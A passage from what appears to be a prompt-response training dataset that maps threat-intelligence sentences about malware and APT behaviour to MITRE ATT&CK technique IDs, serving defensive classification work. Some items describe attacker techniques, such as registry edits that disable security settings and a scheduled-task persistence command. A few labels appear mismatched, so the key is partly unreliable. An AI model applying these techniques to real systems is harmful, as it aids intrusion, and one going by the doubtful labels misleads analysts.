enable otherwise unwarranted access to accounts.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has a tool that creates a new service for persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The BRONZE BUTLER uploader or malware the uploader uses command to delete the RAR archives after they have been exfiltrated.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SNUGRIDE encrypts C2 traffic using AES with a static key.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used RDP for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mis-Type runs tests to determine the privilege level of the compromised user.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla RPC backdoors can impersonate or steal process tokens before executing commands.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Andariel has used watering hole attacks, often with zero-day exploits, to gain initial access to victims within a specific IP range.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa performed padding with null bytes before calculating its hash.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PipeMon communication module can use a custom protocol based on TLS over TCP.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drovorub can download files to a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rancor has used cmd.exe to execute commmands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can send information about the compromised host and upload data to a hardcoded C2 server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Psylo has a command to download a file to the system from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Volgmer variants use SSL to encrypt C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower has the ability to identify the current user on the infected host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can create or add files to Registry Run Keys to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet adds a Registry value for its installation routine to the Registry Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System Enable LUA=”0” and HKEY_CURRENT_USER\Software\DC3_FEXEC.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used intercepter-NG to sniff passwords in network traffic.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can retrieve the victim’s username.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used alongside the AIRBREAK and BADFLICK backdoors### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre uses HTTPS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used embedded image tags with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has removed security settings for VBA macro execution by changing registry values HKCU\Software\Microsoft\Office\<version>\<product>\Security\VBAWarnings and HKCU\Software\Microsoft\Office\<version>\<product>\Security\AccessVBOM.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla RPC backdoors can collect files from USB thumb drives.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reaver collects the victim's username.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used the Invoke-Inveigh PowerShell cmdlets, likely for name service poisoning.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.### Assistant: T1528: Steal Application Access Token" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group also side-loads its backdoor by dropping a library and a legitimate, signed executable .### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RGDoor encrypts files with XOR before sending them back to the C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries.### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 1: Contents of the Email A review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has used YouTube to store and hide C&C server domains.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT has the ability to run cancel or closeanddeletestorage to remove all files from storage and delete the storage temp file on a compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has a tool that can locate credentials in files on the file system such as those from Firefox or Chrome.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint can uninstall the malicious service from an infected machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One version of Helminth uses batch scripting.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases, adversaries may stop or disable many or all services to render systems unusable.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,8 Making a copy of certutil and regsvr32 Certutil.exe (a copy is renamed to certis.exe by the trojan) is normally used in a windows environment to manage certificates, but in this case, it is used by the second stylesheet to download the malware payloads### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Waterbear can receive and load executables from remote C2 servers.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony has used scripts to delete itself after execution.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker terminates various services related to system security and Windows.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA runs the whoami and query user commands.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee collects data from the local victim system.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba has used SeDebugPrivilege and AdjustTokenPrivileges to elevate privileges.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has maintained persistence by placing itself inside the current user's startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharpStage has used a legitimate web service for evading detection.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VDSO hijacking involves redirecting calls to dynamically linked shared libraries.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon can iterate over the running processes to find a suitable injection target.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel used a virus that propagates by infecting executables stored on shared drives.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may scan victims for vulnerabilities that can be used during targeting.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has queried the infected system's registry searching for specific registry keys associated with antivirus products.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has dropped implants in folders named for legitimate software.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has used SMS and email messages with links designed to steal credentials.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DGAs can take the form of apparently random or “gibberish” strings when they construct domain names by generating each letter.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot modifies the time of a file as specified by the control server.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE uses the command prompt to execute commands on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke has been packed with multiple layers of encryption.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3: no detections for SpeakUp in Virus Total In an attempt to endure the investigation process by security researchers, the second stage payload was encoded with salted base64### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BISCUIT has a command to periodically take screenshots of the system.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 uses a Port 22 malware variant to modify several Registry keys.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client .### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used Twitter to monitor potential victims and to prepare targeted phishing e-mails.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda have acquired C2 domains prior to operations.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team used UPX to pack a copy of Mimikatz.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RARM Creates RAR files per logical drive containing data with timestamps for the past 30 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop has been packed to help avoid detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil has been executed via malicious MS Word e-mail attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The executable version of Helminth has a module to log clipboard contents.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CoinTicker executes a Python script to download its second stage.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MURKYTOP uses the command-line interface.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty establishes persistence by creating a scheduled task with the command SchTasks /Create /SC DAILY /TN BigData /TR “ + path_file + “/ST 09:30“.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe has registered domains to mimic file sharing, government, defense, and research websites for use in targeted campaigns.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike's Beacon payload is capable of running shell commands without cmd.exe and PowerShell commands without powershell.exe Grandoreiro can execute through the WinExec API.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee's service-based DLL implant can execute a downloaded file with parameters specified using CreateProcessAsUser.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cadelspy initially arrives on the computer as a dropper, which downloads two installer components catering to whether the victim is running a 32-bit or 64-bit system### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can use the ITaskService, ITaskDefinition and ITaskSettings COM interfaces to schedule a task.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has conducted brute force password spray attacks.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired or previously compromised .### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LSA secrets can also be dumped from memory.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similarly, at may also be used for Privilege Escalation if the binary is allowed to run as superuser via sudo.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie is able to achieve persistence via a .lnk file that is stored within the victim’s startup path### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elderwood has encrypted documents and malicious executables.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum has used a custom implementation of AES encryption to encrypt collected data.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search victim-owned websites to gather actionable information.### Assistant: T1594: Search Victim-Owned Websites" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Winnti for Linux has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis compressed collected data using zlib.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can connect to and disable the Symantec server on the victim's network.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default, /etc/shadow is only readable by the root user.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, in the event Kaspersky is detected, the malware will immediately run the ‘Conime.lnk’ shortcut file in a new process after it is created### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has exfiltrated data via HTTP to already established C2 servers.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 has registered hundreds of domains for use in operations.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer can modify the timestamp of an executable so that it can be identified and restored by the decryption tool.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FrameworkPOS can XOR credit card information before exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets .### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also conduct Change Default File Association and Masquerading to cause a similar effect.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson contains a command to perform screen captures.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor can inject its payload into iexplore.exe process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly dropped and executed Hydra, a password cracker.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy can execute remote commands via the command-line interface.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can use base64 encoding, string stacking, and opaque predicates for obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Credential information may also be exposed to adversaries via leaks to online or other accessible data sets , breach dumps, code repositories, etc.. Adversaries may also purchase credentials from dark web or other black-markets.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec also searches for custom network encryption software on victims.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Launch Agent name may be disguised by using a name from the related operating system or benign software.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel malware has employed just-in-time decryption of strings to evade sandbox detection.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may rely upon specific actions by a user in order to gain execution.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If running with elevated privileges, OSX/Shlayer uses the spctl command to disable Gatekeeper protection for a downloaded file.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperBro has the ability to run an application or script/file via API.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Cybereason platform was able to detect the malicious injection, identifying Irdsnhrxxxfery64.~, Irdsnhrxxxfery98.~, and module arqueiro.  The downloaded modules found in regsvr32.exe as detected by the Cybereason platform### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest uses the kill_unwanted function to get a list of running processes, compares each process with an encrypted list of “unwanted” security related programs, and kills the processes for security related programs.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The sudo command ""allows a system administrator to delegate authority to give certain users the ability to run some commands as root or another user while providing an audit trail of the commands and their arguments.""### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy can securely delete a file by hooking into the DeleteFileA and DeleteFileW functions in the Windows API.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Orz can gather victim drive information.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most Sakula samples maintain persistence by setting the Registry Run key SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ in the HKLM or HKCU hive, with the Registry value and file name varying by sample.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rancor has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,objectClass=trustedDomain ### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has used WMI to execute binaries.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN5 has obtained and used a customized version of PsExec, as well as use other tools such as pwdump, SDelete, and Windows Credential Editor.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The QakBot dropper can delay dropping the payload to evade detection.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT28 loader Trojan adds the Registry key HKCU\Environment\UserInitMprLogonScript to establish persistence.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar is obfuscated using the open source ConfuserEx protector.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has staged stolen data on designated servers in the target environment.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used encryption for its C2 channel.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian has the ability to use Python to spawn a Unix shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These layers include the Operating Systems , server applications such as web servers, DNS servers, databases, and the applications that sit on top of them.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti can retrieve the ARP cache from the local system by using the GetIpNetTable API call and check to ensure IP addresses it connects to are for local, non-Internet, systems.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used malware to turn off the RequireSigned feature which ensures only signed DLLs can be run on Windows.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ngrok has been used by threat actors to proxy C2 connections to ngrok service subdomains.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has obfuscated code using base64 and gzip compression.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Firstly, the reason this has been named MirageFox instead of just Mirage, is because in the Export directory for the modules, the name field is filled with a string MirageFox_Server.dat### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows event logs record user and system activity such as login attempts, process creation, and much more.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST used Rundll32 to execute payloads.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore changes the permissions of a payload using the command chmod -R 755.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 11: PowerShell script is XOR encoded using a single byte key After deobfuscating the contents of the PowerShell Script, we can divide it into three sections### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework., query user### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Decrypting the Configuration As previously mentioned, the real configuration data is stored in the first stage shellcode but it is not stored in cleartext, but encrypted and compressed### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AuditCred is installed as a new service on the system.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, some implementations can introduce visible artifacts for the user .### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use a file exfiltration tool to collect recently changed files with specific extensions.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,“Knock” also appears in several strings inside the code of SpeakUp### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group also uses a tool to execute commands on remote computers.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot's second stage DLL has set a timer using “timeSetEvent” to schedule its next execution.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface .### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has searched compromised systems for folders of interest including those related to HR, audit and expense, and meeting memos.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT steals files based on an extension list if a USB drive is connected to the system.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and 